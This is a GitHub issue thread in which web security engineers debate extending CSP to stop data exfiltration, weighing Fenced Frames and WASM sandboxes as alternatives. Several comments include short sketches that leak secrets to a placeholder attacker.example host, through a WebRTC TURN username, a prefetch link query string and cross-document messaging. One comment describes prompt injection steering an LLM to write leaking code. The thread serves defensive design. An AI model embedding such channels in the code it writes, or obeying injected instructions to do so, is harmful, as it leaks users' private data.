
CSP and data exfiltration #656

Open
yoavweiss opened this issue Sep 11, 2024 · 20 comments
@yoavweiss
Contributor

CSP currently has a few gaps that prevent it from being a useful anti-exfiltration mechanism. https://www.w3.org/TR/CSP3/#exfiltration hints that preventing data exfiltration may be a goal, but it's not very explicit.

I'd like to gauge folks' willingness to make anti-exfiltration an explicit goal. If we were to take that route, we'd probably want to:

  1. Cover the network requests that current directives miss (e.g. prefetches/preconnects, lower-level network APIs such as WebRTC, and the DNS traffic they trigger).
  2. Bring back some form of control over navigations (the territory navigate-to was meant to cover).

That's a bunch of work, and I'm not suggesting we have to tackle all of it in one go. But I want to understand if this is something that the group is interested in, directionally.
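To make the first item concrete, here is a sketch (not a PoC against any real site; attacker.example is a placeholder) of why connect-src alone doesn't close the network channel: WebRTC's ICE traffic isn't governed by CSP today, so a few lines of script can walk data out through a TURN username.

```js
// Sketch: the secret rides out in the TURN username; neither the DNS
// lookup nor the STUN/TURN traffic is subject to connect-src.
const secret = 'value scraped from the page'; // stand-in
const pc = new RTCPeerConnection({
  iceServers: [{
    urls: 'turn:attacker.example:3478', // placeholder host
    username: encodeURIComponent(secret),
    credential: 'x',
  }],
});
pc.createDataChannel('c');                               // gives ICE something to gather for
pc.createOffer().then((o) => pc.setLocalDescription(o)); // kicks off ICE
```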

@yoavweiss
Contributor Author

^^ @weizman - who helped me formulate the above list

@weizman
Member

weizman commented Sep 11, 2024

I would love to see (and help with) progress on this matter. We've been worried about data leakage for years, and this could genuinely help ship safer web applications.

@ArcEglos

I just wanted to chime in and also voice excitement about the possibility of this gaining traction!

We're making heavy use of CSP as part of the sandboxing in our artifacts feature on claude.ai. Having these gaps closed on the CSP side would really help us feel confident building more powerful features on top of it.
If there is anything we can do to help make this happen, I think we'd be happy to contribute and support.

For context:
Artifacts is our feature that (among other things) allows people to run bits of code authored by Claude - our AI model. The code runs inside a sandbox built specifically for this using iframes and CSP. Obviously, protecting against exfiltration is important for this use case, as the code written by Claude could include sensitive information.

@weizman
Member

weizman commented Sep 12, 2024

> I just wanted to chime in and also voice excitement about the possibility of this gaining traction!
>
> We're making heavy use of CSP as part of the sandboxing in our artifacts feature on claude.ai. Having these gaps closed on the CSP side would really help us feel confident building more powerful features on top of it.
> If there is anything we can do to help make this happen, I think we'd be happy to contribute and support.
>
> For context:
> Artifacts is our feature that (among other things) allows people to run bits of code authored by Claude - our AI model. The code runs inside a sandbox built specifically for this using iframes and CSP. Obviously, protecting against exfiltration is important for this use case, as the code written by Claude could include sensitive information.

Say @ArcEglos, for such a use case, wouldn't running the untrusted code within a sandboxed iframe cut it?

If it runs within such an iframe that has no origin, the ability to leak information from within it would be pointless, because there won't be any sensitive information there (everything that's sensitive is stored within the origin of your app, to which the sandboxed code won't have access).

Can you elaborate on your use case? As in, why isn't this enough for it?
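To sketch the setup I mean (untrusted.html is a stand-in for wherever the generated code is served from): sandbox without allow-same-origin puts the frame in an opaque origin, so the embedder's cookies, storage and DOM are out of reach.

```html
<!-- allow-scripts without allow-same-origin = opaque origin:
     the code runs, but nothing origin-bound is reachable. -->
<iframe sandbox="allow-scripts" src="untrusted.html"></iframe>
```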

@arturjanc
Contributor

I'll share my take because this is something that's been discussed in WebAppSec several times (e.g. see this old thread) and keeps coming up :)

At a high level, I agree that it would be nice if we had a mechanism that prevented data exfiltration from attacker-controlled documents. However, the challenge is that CSP in its current shape is not it (and will arguably not be sufficient even if we address the issues we mentioned above), and - more broadly - that providing any meaningful guarantees would require solving multiple open problems that we currently don't have solutions for.

To see why, let's first establish that the only scenario in which robust exfiltration protections have value is when the attacker can execute JavaScript in the context of a document with some sensitive information we want to prevent them from leaking to the outside. If there's no injection / untrusted code execution in the first place we don't need to constrain the ability of the document to make external requests (except to prevent otherwise well-meaning developers from accidentally loading resources from untrusted destinations, which existing CSP directives already do a good enough job of restricting). If there's an injection but the attacker isn't able to execute scripts (e.g. because there's a strict CSP which prevents JS execution), the attacker may be able to make external requests, but generally won't be able to leak the secrets from the page because they will not have the ability to take these secrets and include them in the external requests they make. (There are a few caveats here, such as dangling markup attacks and CSS-based exfiltration, but let's put them aside because they can be solved with CSP and default changes to browsers.)

So, assume the attacker can execute JS in the context of a document with secrets that we want to protect and that the attacker's JS can access. The problem is that preventing this code from leaking these secrets would require all of the following:

  1. Covering all possible network requests sent by the browser with CSP directives; this requires adding controls on prefetches/preconnects, navigations (navigate-to), lower-level network APIs, etc., as @yoavweiss mentioned above.
  2. Restricting the use of JS APIs that can be used for cross-document communication (a sketch of these side doors follows this list). This means restricting things like postMessage, BroadcastChannel, but also the ability to set window.name, document.cookie and possibly other client-side storage APIs (localStorage, IndexedDB, etc.). Some of these attacks could be addressed if the document with the attacker-supplied code is hosted in a unique origin only used once, but that assumes developers will know that this is a requirement and properly implement their origin segmentation logic.
  3. Addressing all browser-side covert channels. There are many known ways to transmit information to other documents opened by the user (e.g. attacker-controlled documents from different origins loaded in separate tabs/iframes); this includes transmitting data by modulating the use of shared resources such as CPU, GPU, bandwidth, memory or disk in ways that are observable cross-origin, or exhausting browser-level limits (e.g. using up the global limit of network sockets). These seem complex, but pretty much all of them have known PoCs.
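To make (2) concrete, a sketch of a few of those side doors (secret stands in for whatever the injected script can read); none of these lines touch the network, yet each hands data to another document:

```js
const secret = 'data the injected script can read'; // stand-in
localStorage.setItem('dead-drop', secret);          // readable by any same-origin page
new BroadcastChannel('chan').postMessage(secret);   // pushed to same-origin documents
window.name = secret;                               // survives cross-origin navigation
parent.postMessage(secret, '*');                    // delivered to whatever embeds us
```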

While I could imagine us doing (1) and (2) - likely with non-trivial implementation costs - we don't have any realistic solutions for (3). This is important because preventing exfiltration is unfortunately an all-or-nothing proposition. If we fix all of these channels except one, it will be insufficient to achieve the security goal we're discussing here. Given the amount of work necessary on various fronts, I'm worried that it would be quite difficult to get to a point where we meaningfully prevent exfiltration.

Finally, the challenge is that even if we built the necessary directives into browsers, a lot of the security will hinge on developers' adhering to a number of application-level constraints outside of the control of CSP (e.g. using unique origins, ensuring that there are no sibling iframes to which content could be postMessaged, enabling Cross-Origin Opener Policy, etc). We know that CSP is very easy for developers to misconfigure by crafting policies that look reasonable, but provide no real security benefit; I'd be worried that we'd create such a situation here, where it would require world-class expertise to enable anti-exfiltration defenses that aren't trivially bypassable.

Instead, what I'd suggest is to look at special-purpose APIs, similar to e.g. Fenced Frames which have exfiltration defenses as an explicit design goal. AFAIK Fenced Frames don't aim to protect against covert channels, but it could make sense to see if we could add any relevant defenses there.

@mozfreddyb
Contributor

I will keep my comment short and say that I subscribe to @arturjanc's worry. CSP might indeed not be the best place: adding restrictions to a document seems like an error-prone approach, especially as the available APIs are going to be a moving target.

I would much rather have us explore an environment where there's a limited allowed set of APIs that can be expanded according to a specific threat model, with strong security guarantees.

You'll have to pardon my ignorance @arturjanc, but is that what Fenced Frames is supposed to be?
Can you maybe go into some details why Fenced Frames wouldn't have to deal with the challenges you described for a CSP-control against data exfiltration?

@arturjanc
Contributor

> Can you maybe go into some details why Fenced Frames wouldn't have to deal with the challenges you described for a CSP-control against data exfiltration?

In a nutshell, the goal of Fenced Frames is to prevent a collaborating embedder and fenced frame from exchanging information with each other: "The fenced frame enforces a boundary between the embedding page and the cross-site embedded document such that user data visible to the two sites is not able to be joined together." - this implicitly does a lot of the things we'd want in a solution for preventing exfiltration.

There are a lot of details, but the main properties of fenced frames are outlined in the design, privacy and security sections of the explainer.

As is, Fenced Frames aren't a solution for data exfiltration because they allow network communication (though IIRC the original version of this proposal disabled all network requests) and don't protect against covert channels. But I could imagine incremental / opt-in changes to Fenced Frames that would get us closer to providing exfiltration protections.
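For readers who haven't seen the API, a rough sketch of how a fenced frame is embedded (hedged: you can't point a fenced frame at an arbitrary URL; fencedFrameConfig here is assumed to be an opaque FencedFrameConfig minted by a platform API such as Protected Audience):

```html
<fencedframe id="ff"></fencedframe>
<script>
  // fencedFrameConfig is assumed to come from a platform API; the
  // embedder never sees the URL or data behind the opaque config.
  document.getElementById('ff').config = fencedFrameConfig;
</script>
```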

@shhnjk
Member

shhnjk commented Sep 12, 2024

> I would much rather have us explore an environment where there's a limited allowed set of APIs that can be expanded according to a specific threat model, with strong security guarantees.

FYI, we've had this environment for a few years now, with WASM and importObject (see https://github.com/shhnjk/as-sec). It's just that the code has to be compiled before use.

@ArcEglos

ArcEglos commented Sep 12, 2024

>> I just wanted to chime in and also voice excitement about the possibility of this gaining traction!
>>
>> We're making heavy use of CSP as part of the sandboxing in our artifacts feature on claude.ai. Having these gaps closed on the CSP side would really help us feel confident building more powerful features on top of it.
>> If there is anything we can do to help make this happen, I think we'd be happy to contribute and support.
>>
>> For context:
>> Artifacts is our feature that (among other things) allows people to run bits of code authored by Claude - our AI model. The code runs inside a sandbox built specifically for this using iframes and CSP. Obviously, protecting against exfiltration is important for this use case, as the code written by Claude could include sensitive information.

> Say @ArcEglos, for such a use case, wouldn't running the untrusted code within a sandboxed iframe cut it?
>
> If it runs within such an iframe that has no origin, the ability to leak information from within it would be pointless, because there won't be any sensitive information there (everything that's sensitive is stored within the origin of your app, to which the sandboxed code won't have access).
>
> Can you elaborate on your use case? As in, why isn't this enough for it?

The main issue is that the code itself can be sensitive or have access to sensitive information. E.g. Claude could, based on the information in the prompt, write code that has some sensitive bits inlined as strings, which it then sends to the outside world when the code is executed - for example by making each of these strings a query parameter on a prefetch HTML element.
Also, we'd ideally want to allow this untrusted code to still take specific well-defined actions in the outside world (through a properly limited API between the contexts) - e.g. reading in data from it - which could increase the amount of sensitive data in the sandbox a lot.

These scenarios are somewhat unlikely to happen by user error but there are certainly attack chains imaginable that lead to such a result.
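To spell out the prefetch example above (attacker.example is a placeholder for a collection endpoint):

```html
<!-- If prefetches aren't governed by CSP, the inlined secret rides out
     as a query parameter the moment this element hits the DOM. -->
<link rel="prefetch" href="https://attacker.example/collect?d=INLINED_SECRET">
```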

To your points @arturjanc:

> While I could imagine us doing (1) and (2) - likely with non-trivial implementation costs - we don't have any realistic solutions for (3). This is important because preventing exfiltration is unfortunately an all-or-nothing proposition.

I do agree with the characterization of these three categories. Thank you for separating them out so nicely! But I do think that there is significant value to be had by solving just (1) and (2), because it still makes the attack chains a lot harder to execute, depending on the specific circumstances, and reduces the surface, which is helpful as a mitigation. At the end of the day, security is often a question of lowering the probability to an acceptable but non-zero level.

> I'd be worried that we'd create such a situation here, where it would require world-class expertise to enable anti-exfiltration defenses that aren't trivially bypassable.

This is certainly a relevant worry. It's already quite complicated, and this would certainly make the list of things you can forget about longer. However, I would argue that it would not make things worse than the current situation and would still be a win.

However, my counterpoints are ONLY relevant if the two worlds to choose between are improvements to CSP vs. the current state. If there is a third world where we have other robust mechanisms to stop such exfiltration, that would of course be even better!
I am, however, a bit worried that this sounds like a multi-year project, while to me - and I say that very much as an outsider, so please apply many grains of salt to this - it feels like targeted improvements to CSP could deliver some value (albeit less of it) faster.

@shhnjk

>> I would much rather have us explore an environment where there's a limited allowed set of APIs that can be expanded according to a specific threat model, with strong security guarantees.

> FYI, we've had this environment for a few years now, with WASM and importObject (see https://github.com/shhnjk/as-sec). It's just that the code has to be compiled before use.

One question from someone not doing a ton with WASM myself yet: this would still require running untrusted code outside of this primitive for DOM interactions, did I get that right? Or did I miss something about how this interacts?

@shhnjk
Member

shhnjk commented Sep 12, 2024

>>> I would much rather have us explore an environment where there's a limited allowed set of APIs that can be expanded according to a specific threat model, with strong security guarantees.

>> FYI, we've had this environment for a few years now, with WASM and importObject (see https://github.com/shhnjk/as-sec). It's just that the code has to be compiled before use.

> One question from someone not doing a ton with WASM myself yet: this would still require running untrusted code outside of this primitive for DOM interactions, did I get that right? Or did I miss something about how this interacts?

Right, the WASM environment does not have access to the DOM or network by default (which provides the security guarantees). You can then expose arbitrary APIs to WASM via importObject (see this importObject code and WASM code).
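A minimal sketch of the pattern - wasmBytes stands in for a module compiled ahead of time (e.g. from AssemblyScript), and env.log is the one capability we choose to grant:

```js
// The module can compute whatever it likes, but its only window to the
// outside world is what importObject hands it - here, a single log call.
const importObject = {
  env: {
    log: (x) => console.log('wasm says:', x),
  },
};
const { instance } = await WebAssembly.instantiate(wasmBytes, importObject);
instance.exports.main(); // no DOM, no fetch - just env.log
```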

@arturjanc
Contributor

> But I do think that there is significant value to be had by solving just (1) and (2), because it still makes the attack chains a lot harder to execute, depending on the specific circumstances, and reduces the surface, which is helpful as a mitigation.

I empathize with this view, but the problem is that browsers would need to invest significant resources in implementing capabilities to restrict various existing behaviors -- and developers would need to invest in deploying these restrictions in their services -- to achieve a security property that stops holding as soon as the user has any attacker-controlled document open in their browser. This is generally not how we want the web security model to work - we need to have robust boundaries and assume that the user may be concurrently viewing untrusted content (also because it's often easy for a malicious site to navigate the user to chosen endpoints on the victim site and set up the right conditions for exfiltration).

This would be less of a concern if the primitives existed in the platform, or were trivial to add, and it was just a question of getting developers to use them. But the necessary CSP knobs here are non-trivial to build and in some cases run into concerns (e.g. navigate-to had some issues with redirect-based XS-leaks); so it would require a big effort and cross-browser consensus, which makes the security "ROI" here somewhat dubious.

> I am, however, a bit worried that this sounds like a multi-year project, while to me - and I say that very much as an outsider, so please apply many grains of salt to this - it feels like targeted improvements to CSP could deliver some value (albeit less of it) faster.

I actually think it may be the other way around here, for a number of reasons. CSP is a very general mechanism usually enabled as a mitigation against script execution in the event of injections; it's commonly applied to an entire service/webapp and requires configurability that allows creating policies that will be adoptable in existing content (e.g. fine-grained allowlists for each directive). It's also overloaded with complexity and hard to extend for a variety of unfortunate reasons.

The use cases where we'd benefit from exfiltration protections are very different: it's usually about applying restrictions to a separate document (e.g. iframe) where an attacker can execute scripts that have access to some sensitive data. To achieve exfiltration protections here we don't need a dozen different configurable settings, we just need that context to completely turn off the three main communication channels we're discussing here (network requests, local communication/storage APIs, covert channels), which is simpler conceptually than building fine-grained controls for all these things.

So, counter-intuitively, I'd expect a new special-purpose API to be a more promising approach here, largely because it avoids the baggage of having to integrate with CSP. I'm not sure how easy it will be to sell browser vendors on this idea, but I'd expect this to be on par with selling them on extending CSP :)

@ArcEglos

Thanks a lot for the wider context of these things! Super helpful to calibrate things in my head.

I guess the way to go about convincing browser vendors of such a new API is not in this GitHub issue? If that assumption is correct, I'd be super thankful for any advice on how best to approach working towards this - assuming there might be some possibility of us being willing to contribute to/sponsor efforts.

@dveditz
Member

dveditz commented Sep 14, 2024

> CSP currently has a few gaps that prevent it from being a useful anti-exfiltration mechanism. https://www.w3.org/TR/CSP3/#exfiltration hints that preventing data exfiltration may be a goal, but it's not very explicit.

At one point anti-exfiltration was an explicit NON-goal!

@arturjanc
Contributor

> I guess the way to go about convincing browser vendors of such a new API is not in this GitHub issue?

I think it could make sense to discuss this at one of the upcoming WebAppSec meetings (possibly at TPAC in a week or so) and see what folks think about an anti-exfiltration web security primitive. /cc @mikewest who might have thoughts :)

@estark37
Contributor

While I agree that CSP is not so promising for preventing exfiltration, I have my doubts about a dedicated API. It's hard for me to imagine how we would define which attacks are in and out of scope. Fenced Frames, AIUI, are sort of trying to reduce abusive behavior at scale, so it's okay-ish for them not to have a firm security boundary, but that becomes less plausible as the goal gets closer to categorically preventing exfiltration.

I'd be interested to hear more about the use cases, in particular if they need to accommodate arbitrary code operating on arbitrary data, or how much the code and/or data can be constrained in such a way to make the problem easier. Also, does the code really need to run in the browser, or could it run remotely?

@ArcEglos

At least in our case the code is indeed very arbitrary. Essentially the user asks the LLM to build a tool or interactive experience for them (or the LLM decides based on the user query that this is the best way to help the user with their query).

This can mean making a WebGL-based particle simulation illustrating a physical process; it can be a web UI that allows the user to enter data that is then processed and stored in some way (e.g. a task tracker or something similar); it could be a dashboard that reads some data from attached context and visualises it in an interactive UI for the user to filter or scroll along a timeline. It could also be an interactive presentation that mixes traditional-looking slides with mini games in between. Or a mix of all of the above. What they all have in common is basically only:

  1. They have some kind of interactive UI
  2. They are not authored by the user

It's ephemeral arbitrary software.

There are a few different attack vectors, but one of the most prominent is prompt injection: a malicious actor managing to - unbeknownst to the user - inject instructions into the query that tell the LLM to exfiltrate data using this doorway.

I'm sceptical about running the code remotely because the inherent interactivity of most of these experiences would make that hard. It might be possible in the long term to have fairly decent protection against such prompt injection, but it will likely never be provably reliable. So, especially as these experiences get more complex over the coming years while being adopted by more professional institutions, this will probably remain a weak point without good exfiltration protection.

It would be completely acceptable for WebRTC or WebTransport, for example, to not be available at all in these contexts; that limitation would easily be worth it.

As an illustration, here are a few examples of things colleagues or other people on the internet have built this way (these are explicitly published ones where exfiltration is not so relevant, but in most usage these would live inside your account next to a conversation with the LLM and would be very private):
https://claude.site/artifacts/12fe4ec9-8593-4868-8656-ab0d0fbb35bf
https://x.com/taekie/status/1833296667040485784
https://claude.site/artifacts/3b036fbc-4025-471f-a669-878936d0b6a3
https://claude.site/artifacts/0cabdb21-0787-46cd-ab4b-aed538a91000
https://claude.site/artifacts/a882fcd1-d5de-408b-81c1-debf768260cf
https://x.com/MaxZiebell/status/1835649986819686785

These are all created without the user doing any coding. Currently they are all more or less toy-like, mostly because they are missing basic APIs to interact with the user's data in a meaningful way. They will very quickly evolve into useful tools.

@weizman
Member

weizman commented Sep 17, 2024

Here's my "counter" take, @arturjanc, as I think solving this problem is actually very important.

> At a high level, I agree that it would be nice if we had a mechanism that prevented data exfiltration from attacker-controlled documents. However, the challenge is that CSP in its current shape is not it (and will arguably not be sufficient even if we address the issues we mentioned above), and - more broadly - that providing any meaningful guarantees would require solving multiple open problems that we currently don't have solutions for.

I can't respond to that, I am only at the beginning of my journey to learn the complexity of security models in browsers, I trust you know best.

> To see why, let's first establish that the only scenario in which robust exfiltration protections have value is when the attacker can execute JavaScript in the context of a document with some sensitive information we want to prevent them from leaking to the outside. If there's no injection / untrusted code execution in the first place we don't need to constrain the ability of the document to make external requests (except to prevent otherwise well-meaning developers from accidentally loading resources from untrusted destinations, which existing CSP directives already do a good enough job of restricting). If there's an injection but the attacker isn't able to execute scripts (e.g. because there's a strict CSP which prevents JS execution), the attacker may be able to make external requests, but generally won't be able to leak the secrets from the page because they will not have the ability to take these secrets and include them in the external requests they make. (There are a few caveats here, such as dangling markup attacks and CSS-based exfiltration, but let's put them aside because they can be solved with CSP and default changes to browsers.)

I completely agree that execution of untrusted code is needed for data leakage to become a problem worth fixing, especially since you did not ignore the small subset of attacks that don't necessarily require JS (CSS/markup related).

However, based on the tone, I gather you're implying that this is a niche problem, somewhere along the lines of "if one can execute JS, we have far worse problems than info leakage".

In the era where attacks that translate into code execution were mostly limited to XSS, I think that statement would have been very true. But the way we build web apps has changed dramatically, and now most of the code our apps are made of is created and controlled by entities that are not us - aka supply-chain driven development.

This paradigm shift changes how we should look at attacks against the origin of an app, and more importantly, how to defend against them.

Mitigating XSS attacks is somewhat more straightforward because they're essentially code that comes from outside the app, or they have somewhat clear sinks. With supply chain attacks it's the opposite - the code that introduces the attack is code we trust, so telling good code from bad becomes a very abstract task.

While we're coming up with a lot of ways to handle this shift of thinking, there's an essential concept of defense we have to embrace (IMO) given how it becomes too hard to point at a specific sink and shut it down, and that is the concept of hardening our origin.

That's somewhat intuitive - if it's becoming too abstract to identify attacks on our origin, given the power we grant others to run code within it (aka dependencies), then unlike before, we must assume we ourselves allowed an attacker to run in our origin, which means we must harden the security of our origin from within as well as from outside.

A very big part of that is having full control over outgoing network traffic - if we assume there's an attacker within our origin, it makes a lot of sense to prevent them from stealing origin-sensitive information.
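For concreteness, this is roughly the most control today's CSP gives over outgoing traffic (api.example.com stands in for an app's real backend) - and the gaps discussed in this issue all slip past it:

```http
Content-Security-Policy: default-src 'none'; script-src 'self'; connect-src 'self' https://api.example.com
```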

> So, assume the attacker can execute JS in the context of a document with secrets that we want to protect and that the attacker's JS can access. The problem is that preventing this code from leaking these secrets would require all of the following:
>
>   1. Covering all possible network requests sent by the browser with CSP directives; this requires adding controls on prefetches/preconnects, navigations (navigate-to), lower-level network APIs, etc., as @yoavweiss mentioned above.

100%

>   2. Restricting the use of JS APIs that can be used for cross-document communication. This means restricting things like postMessage, BroadcastChannel, but also the ability to set window.name, document.cookie and possibly other client-side storage APIs (localStorage, IndexedDB, etc.). Some of these attacks could be addressed if the document with the attacker-supplied code is hosted in a unique origin only used once, but that assumes developers will know that this is a requirement and properly implement their origin segmentation logic.

Why is that? I could use some clarification here: this proposal focuses on "browser-to-outside" communication, while this section addresses "in-browser, document-to-document" communication - something else entirely, a different attack vector that would require more prerequisites for attackers to leverage into "browser-to-outside" communication.

>   3. Addressing all browser-side covert channels. There are many known ways to transmit information to other documents opened by the user (e.g. attacker-controlled documents from different origins loaded in separate tabs/iframes); this includes transmitting data by modulating the use of shared resources such as CPU, GPU, bandwidth, memory or disk in ways that are observable cross-origin, or exhausting browser-level limits (e.g. using up the global limit of network sockets). These seem complex, but pretty much all of them have known PoCs.

Again, same as the section before: while this is possible, the prerequisites needed for this vector to turn into "browser-to-outside" communication make it a completely different problem that I don't find to be in scope.

Regarding the last two sections, the most important part is that not only are they different in nature and require complex conditions to be set up by an attacker in addition to code execution, but the web as a platform already provides builders with the tools needed to address these issues (e.g. use frame-src to block unwanted cross-origin documents to begin with).

That is the core difference between those sections and section (1), which is not addressable no matter how willing builders are to embrace all the security means of the web - and that is why section (1) should be addressed regardless of the other two.
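A sketch of those existing tools, for an app that simply wants no cross-origin documents around (both directives have been in CSP for years):

```http
Content-Security-Policy: frame-src 'self'; frame-ancestors 'self'
```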

> While I could imagine us doing (1) and (2) - likely with non-trivial implementation costs - we don't have any realistic solutions for (3). This is important because preventing exfiltration is unfortunately an all-or-nothing proposition. If we fix all of these channels except one, it will be insufficient to achieve the security goal we're discussing here. Given the amount of work necessary on various fronts, I'm worried that it would be quite difficult to get to a point where we meaningfully prevent exfiltration.

This is the part where I might need some further clarification, because as I said earlier, I don't see why that's true. Fixing the first seems highly beneficial to me, especially when integrated with already existing controls such as blocking unwanted cross-origin documents, which can address sections (2) and (3) AFAIU (if otherwise, I would love to be educated).

> Finally, the challenge is that even if we built the necessary directives into browsers, a lot of the security will hinge on developers' adhering to a number of application-level constraints outside of the control of CSP (e.g. using unique origins, ensuring that there are no sibling iframes to which content could be postMessaged, enabling Cross-Origin Opener Policy, etc). We know that CSP is very easy for developers to misconfigure by crafting policies that look reasonable, but provide no real security benefit; I'd be worried that we'd create such a situation here, where it would require world-class expertise to enable anti-exfiltration defenses that aren't trivially bypassable.

Personal opinion - the fact that builders fail to embrace CSP does not make it a failure: while many builders failed to adopt it, those who managed to were successful in providing real security to the origin of their app, which would not have been possible otherwise. Huge success; CSP IMO is awesome. That's why my take is the opposite - even if not everyone successfully adopts these new directives, they will bring great value to those who do, as they currently have zero tools to defend against this problem. Combine that with a rise in the need for a solution (in the context of my earlier supply-chain argument), and pushing this forward could be important progress.

> Instead, what I'd suggest is to look at special-purpose APIs, similar to e.g. Fenced Frames which have exfiltration defenses as an explicit design goal. AFAIK Fenced Frames don't aim to protect against covert channels, but it could make sense to see if we could add any relevant defenses there.

Fenced Frames, as well as many other "sandboxing" solutions, just won't cut it. They can be very useful for many use cases, but moving untrusted code away from the protected origin is practical only to a certain extent, and can't be generally applied to all code we don't trust. Partly because it's an impractical expectation (if we're talking about expecting builders to adopt stuff), but mostly because moving untrusted code to another origin bears significant disadvantages I expect many products won't be able to deal with (many already can't): specifically breakage of synchronicity, identity discontinuity, and generally an inferior way to virtualize a JS environment that must have access to some features of the protected origin (such as the DOM).

So while solutions such as Fenced Frames would do a great job of confining untrusted code from such exfiltration, those whose use cases prevent them from moving all untrusted code away from the origin (whether in favor of fine-grained composability or simply because that's the reality of supply-chain driven development) should also be provided with proper solutions, so they can harden their origin rather than being forced to migrate all untrusted code away from it.

I discuss this last argument further under the RIC proposal we're advocating for, which raises similar concerns about moving untrusted code away from the origin and how feasible that is - WICG/Realms-Initialization-Control#18 (comment) (a proposal that, btw, focuses on hardening your origin for similar reasons).

This is my opinion; I felt it was important to voice it.

I believe that if there are enough people who see things the same way (that, in addition to "sandboxing" solutions, we should aim for embedding untrusted code within the origin of the app for superior composability), the web should represent them.

Unless this is truly something too complex to achieve "engineering-wise" in the browser, which I trust you (and @yoavweiss) to know better than I do.

@lknik

lknik commented Sep 17, 2024

Thank you, @arturjanc, for the remarkable (and concise!) writeup. I share your view on points (1) and (2). Though (3) is quite tricky to fully fix from a web browser, one could assume it shouldn't be a showstopper for (1) and (2) to work. In other words, perhaps there is no need for a completely bullet-proof, ideal product here, assuming (3) is treated as a separate problem.

Now, adding another selling point to Fenced Frames is also a good take. Though there's one difference here: Fenced Frames have no reporting functionality (about potential violations). Having analysed it, and Privacy Sandbox, from a privacy and data protection point of view, I actually believe that adding explicit reporting functionality to Fenced Frames would be a good idea. That way the anti-exfiltration feature could be fully transferred to Fenced Frames. Whether there would be interest in that is another story.

@benatkin

benatkin commented Nov 10, 2024

This issue lays out the problem well. The quickest way to accurately describe the problem is: bypassing the intent of the Content Security Policy. This is definitely possible with WebRTC; I even reproduced it myself. It almost seems bad enough that I want to avoid discussing it openly and only send emails to security addresses. But it's already out in the open.

It seems that with link prefetching there may be a bypass of a CSP with default-src 'none' and network access only allowed to certain hosts, but I haven't seen it reproduced. It also seems that default-src 'none' as applied to <link> tags has reached a maturity that the webrtc directive hasn't (if you add the webrtc directive to your CSP, you'll get errors in your browser's dev tools).

Currently the CSP can prevent accidentally exfiltrating data pretty well, and it seems it can also prevent sneaking in some code that will do that, because the code would have to access RTCPeerConnection, or maybe create a link element (which can be in any part of the document, not just the head). What it can't do is stop untrusted code running in an iframe from exfiltrating data. Fortunately, the spec stops short of claiming that it can.

It may be possible to run untrusted code in a Worker. Luckily, workers don't have access to RTCPeerConnection. They do have access to WebTransport, but having read through WebTransport, I don't think it enables a bypass; the changes being discussed are for unusual situations or future additions, and aren't needed to prevent unintended network access at present. Basically, from my reading, WebTransport will only try to configure an SSL certificate for a connection if connect-src allows the host. Unlike code running in an iframe, code running in a worker is also safe from the potential issue with link tags, because it cannot directly insert link tags into the HTML.
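A sketch of that Worker pattern (the worker body is trivial stand-in code; note that blob: workers also need the page's CSP to allow blob: in worker-src):

```js
// Workers get no DOM and no RTCPeerConnection, which trims the
// exfiltration surface; network APIs like fetch remain, still
// subject to connect-src.
const code = `onmessage = (e) => postMessage(e.data.toUpperCase());`;
const blobUrl = URL.createObjectURL(new Blob([code], { type: 'text/javascript' }));
const worker = new Worker(blobUrl);
worker.onmessage = (e) => console.log(e.data); // "HELLO"
worker.postMessage('hello');
```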

The question I'd like us to ask is: what can we do to get browser vendors to prevent the intent of the CSP from being bypassed? That is, make it so that when we try to express that a page should only be allowed to query certain hosts, it can only make network requests (including DNS) to those hosts - the site itself, Google Fonts, or what have you. WebRTC allows DNS queries to third parties, which is why I think it would be nice if browser vendors made this web platform test pass.
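For reference, the CSP3 directive meant to close the WebRTC channel looks like this; it's the support that's still uneven, hence the dev-tools errors mentioned above:

```http
Content-Security-Policy: default-src 'none'; connect-src 'self'; webrtc 'block'
```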

@benatkin

benatkin commented Nov 11, 2024

Also, regarding navigate-to: even though there's a solid workaround - running untrusted/semi-trusted code in a sandboxed iframe, with the parent setting child-src - that workaround is a pain on mobile due to the layout issues of putting everything in an iframe, plus possible SEO issues, and it isn't in common use. So that one seems important. It also puts the RTCPeerConnection issue into perspective, and I realize I needn't worry about exposing it, because it only affects those trying to build a custom sandboxing technique. We have posts like this one to remind us to be careful. I'm using WebAssembly more because of this, FWIW.
